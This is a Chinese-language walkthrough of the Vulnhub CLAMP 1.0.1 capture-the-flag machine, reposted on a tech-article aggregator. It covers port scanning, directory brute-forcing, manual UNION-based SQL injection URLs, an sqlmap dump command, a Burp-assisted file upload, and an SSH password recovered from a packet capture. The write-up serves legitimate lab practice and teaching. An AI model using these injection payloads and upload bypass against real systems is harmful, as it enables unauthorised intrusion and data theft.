经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
CLAMP 1.0.1 Vulnhub Walkthrough - APT-101
来源:cnblogs  作者:APT-101  时间:2019/8/15 12:11:22  对本文有异议

 

主机层面端口扫描探测:

╰─ nmap -p1-65535 -A -sV 10.10.202.137

访问web服务 

使用dirbuster 加大字段进行目录爆破

http://10.10.202.137/nt4stopc/index.php

 

看看这些问题先:

 

Question

True/False Bit

Baku is the capital of Turkey? 巴库是土耳其的首都

False

0

The beginning of the French revolution is 1798. 法国革命的时间

True

1

Istanbul was conquered in 1435? 伊斯坦布尔于1435年被征服?

True 1
Fatih Sultan Mehmet is the founder of the Ottoman Empire? Fatih Sultan Mehmet是奥斯曼帝国的创始人 False

0

The founder of robot science is Al-Cezeri? 机器人科学的创始人是Al-Cezeri

True 1
Dennis Ritchie, who developed the C language? Dennis Ritchie,他开发了C语言 True

1

The function definition belongs to the C89 standard? 功能定义属于C89标准

True 1

The other element of the array is 1?数组的另一个元素是1

False

0

Is the maximum 32-but value 2,147,482646? 最大32位值是2,147,482646 False

0

Is there an undefined behaviour in the following code? 以下代码中是否存在未定义的行为 True

1

 

 

 

 

 

 二进制:0110111001

http://10.10.202.137/nt4stopc/0110111001

稍等跳转到:
http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/

右键源码:

 

访问尝试下注入:

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3

 

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 and 1=1 #true

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 and 1=2 #false 

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 order by 5--+

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=-3 +UNION+ALL+SELECT+1,2,3,4,5--+

 

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=-3 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+

 

我们直接用SQLmap搞一波吧,手工真麻烦

╰─ sqlmap -u "http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3" --dbs --batch -D tatil -T gereksiz -C gereksiz --dump

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf 应该是一种加密过的字符串,我们尝试Google解密下

https://cryptii.com/pipes/caesar-cipher

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php

卧槽没有提交按钮,是不是隐藏掉了?

这里使用burp抓包修改

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/af73b4a487065af10015796aa6293880.php

 

进行提权操作:

http://10.10.202.137/important.pcapng

 

email=mkelepce&message=Hello+there,+The+password+for+the+SSH+account+you+want+is:+mkelepce:mklpc-osas112.+If+you+encounter+a+problem,+just+mail+it.++Good+work

password:mklpc-osas112.

 完! 

原文链接:http://www.cnblogs.com/hack404/p/11344460.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号